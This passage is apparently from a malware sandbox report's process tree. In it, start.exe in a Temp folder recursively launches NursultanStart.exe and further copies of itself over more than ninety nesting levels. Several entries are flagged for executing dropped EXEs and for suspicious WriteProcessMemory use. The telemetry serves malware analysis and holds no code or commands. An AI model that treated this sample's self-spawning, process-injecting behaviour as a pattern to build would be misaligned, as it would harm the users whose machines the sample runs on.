      "C:\Users\Admin\AppData\Local\Temp\start.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5072
    - - C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        5⤵
        Executes dropped EXE
        
        PID:4252
    - - C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:760
      - C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        6⤵
        Executes dropped EXE
        
        PID:4452
      - C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        7⤵
        Executes dropped EXE
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        8⤵
        Executes dropped EXE
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        9⤵
        Executes dropped EXE
        
        PID:1908
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        10⤵
        Executes dropped EXE
        
        PID:3920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        11⤵
        Executes dropped EXE
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        12⤵
        Executes dropped EXE
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        13⤵
        Executes dropped EXE
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        13⤵
        Executes dropped EXE
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        14⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        14⤵
        Executes dropped EXE
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        15⤵
        Executes dropped EXE
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        15⤵
        Executes dropped EXE
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        16⤵
        Executes dropped EXE
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        16⤵
        Executes dropped EXE
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        17⤵
        Executes dropped EXE
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        17⤵
        Executes dropped EXE
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        18⤵
        Executes dropped EXE
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        18⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        19⤵
        Executes dropped EXE
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        19⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        20⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        20⤵
        Executes dropped EXE
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        21⤵
        Executes dropped EXE
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        21⤵
        Executes dropped EXE
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        22⤵
        Executes dropped EXE
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        22⤵
        Executes dropped EXE
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        23⤵
        Executes dropped EXE
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        23⤵
        Executes dropped EXE
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        24⤵
        Executes dropped EXE
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        24⤵
        Executes dropped EXE
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        25⤵
        Executes dropped EXE
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        25⤵
        Executes dropped EXE
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        26⤵
        Executes dropped EXE
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        26⤵
        Executes dropped EXE
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        27⤵
        Executes dropped EXE
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        27⤵
        Executes dropped EXE
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        28⤵
        Executes dropped EXE
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        28⤵
        Executes dropped EXE
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        29⤵
        Executes dropped EXE
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        29⤵
        Executes dropped EXE
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        30⤵
        Executes dropped EXE
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        30⤵
        Executes dropped EXE
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        31⤵
        Executes dropped EXE
        
        PID:2724
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        31⤵
        Executes dropped EXE
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        32⤵
        Executes dropped EXE
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        32⤵
        Executes dropped EXE
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        33⤵
        Executes dropped EXE
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        33⤵
        Executes dropped EXE
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        34⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        34⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        35⤵
        
        PID:936
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        35⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        36⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        36⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        37⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        37⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        38⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        38⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        39⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        39⤵
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        40⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        40⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        41⤵
        
        PID:4960
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        41⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        42⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        42⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        43⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        43⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        44⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        44⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        45⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        45⤵
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        46⤵
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        46⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        47⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        47⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        48⤵
        
        PID:3680
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        48⤵
        
        PID:1232
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        49⤵
        
        PID:2900
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        49⤵
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        50⤵
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        50⤵
        
        PID:4944
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        51⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        51⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        52⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        52⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        53⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        53⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        54⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        54⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        55⤵
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        55⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        56⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        56⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        57⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        57⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        58⤵
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        58⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        59⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        59⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        60⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        60⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        61⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        61⤵
        
        PID:1276
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        62⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        62⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        63⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        63⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        64⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        64⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        65⤵
        
        PID:556
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        65⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        66⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        66⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        67⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        67⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        68⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        68⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        69⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        69⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        70⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        70⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        71⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        71⤵
        
        PID:3968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        72⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        72⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        73⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        73⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        74⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        74⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        75⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        75⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        76⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        76⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        77⤵
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        77⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        78⤵
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        78⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        79⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        79⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        80⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        80⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        81⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        81⤵
        
        PID:3384
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        82⤵
        
        PID:2552
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        82⤵
        
        PID:1084
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        83⤵
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        83⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        84⤵
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        84⤵
        
        PID:2708
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        85⤵
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        85⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        86⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        86⤵
        
        PID:2236
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        87⤵
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        87⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        88⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        88⤵
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        89⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        89⤵
        
        PID:2288
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        90⤵
        
        PID:2968
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        90⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        91⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        91⤵
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        92⤵
        
        PID:3272
        
        C:\Users\Admin\AppData\Local\Temp\start.exe
        
        "C:\Users\Admin\AppData\Local\Temp\start.exe"
        92⤵
        
        PID:1528
        
        C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"
        93⤵
        
